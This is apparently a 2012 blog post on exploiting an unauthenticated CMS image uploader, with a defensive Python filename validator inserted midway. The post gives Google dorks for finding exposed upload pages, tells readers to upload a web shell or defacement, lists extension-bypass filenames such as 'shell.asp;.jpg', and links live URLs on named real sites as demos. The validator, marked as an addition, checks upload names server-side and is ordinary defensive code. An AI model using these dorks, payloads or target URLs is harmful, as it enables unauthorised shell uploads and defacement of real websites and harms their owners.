
Saturday, June 2, 2012

"Image Uploader" Shell Upload Vulnerability

CMS admin Image Uploader Shell Upload Vulnerability

Google dorks
inurl:"default_image.asp"
inurl:"default_imagen.asp" 

inurl:"/box_image.htm"

You'll get an upload option after clicking on a link from the Google search results.
Now select your deface or shell and upload it =)
Supported formats: shell.asp;.jpg, shell.php;.jpg, .gif, .jpg, .png, .pdf, .zip, .html, .php

You can use Tamper Data too...
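
The names the uploader accepts above (shell.asp;.jpg, .php, .html) are exactly what a server-side check on the upload handler should refuse, since client-side checks can be altered in transit. The following is an added example, not code from the original post or from the affected CMS; the function names, the image-only allowlist and the sample filenames are assumptions.

```python
import os
import re
import secrets

# Assumption: the uploader is meant for images only.
ALLOWED_EXTENSIONS = {".gif", ".jpg", ".jpeg", ".png"}
# Extensions a web server may execute or render as active content.
ACTIVE_EXTENSIONS = {".asp", ".aspx", ".asa", ".cer", ".php", ".phtml",
                     ".html", ".htm", ".shtml", ".jsp", ".cgi"}
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)+")


def check_upload_name(filename):
    """Return (ok, reason) for a client-supplied upload filename."""
    # Drop any client-supplied directory part (both separator styles).
    name = filename.replace("\\", "/").rsplit("/", 1)[-1].strip().lower()
    # Rejects ';', spaces, NUL bytes, trailing dots and similar parser tricks.
    if not SAFE_NAME.fullmatch(name):
        return False, "illegal characters in name"
    parts = ["." + p for p in name.split(".")[1:]]
    # An active extension anywhere in the name is refused (photo.php.jpg).
    if any(p in ACTIVE_EXTENSIONS for p in parts):
        return False, "active-content extension present"
    if parts[-1] not in ALLOWED_EXTENSIONS:
        return False, "extension not on allowlist"
    return True, "ok"


def stored_name(filename):
    """Server-chosen storage name; the client name is never used on disk."""
    ok, reason = check_upload_name(filename)
    if not ok:
        raise ValueError(reason)
    ext = os.path.splitext(filename.strip().lower())[1]
    return secrets.token_hex(16) + ext


# Constructed sample names, including the ones listed in the post.
SAMPLES = ["shell.asp;.jpg", "shell.php;.jpg", "backlinks.html",
           "shell.php", "photo.php.jpg", "logo.png", "report.pdf"]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:20} -> {check_upload_name(s)}")
```

A name check is one layer: the upload page also needs authentication, and stored files belong outside the web root or in a directory where script execution is disabled.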

Live demo : 
https://www.thinkheartland.com/CMS/admin/default_Image.asp
https://www.thinkheartland.com/CMS/admin/images/backlinks.html

http://www.dautphetal.de/edit/default_asset.asp
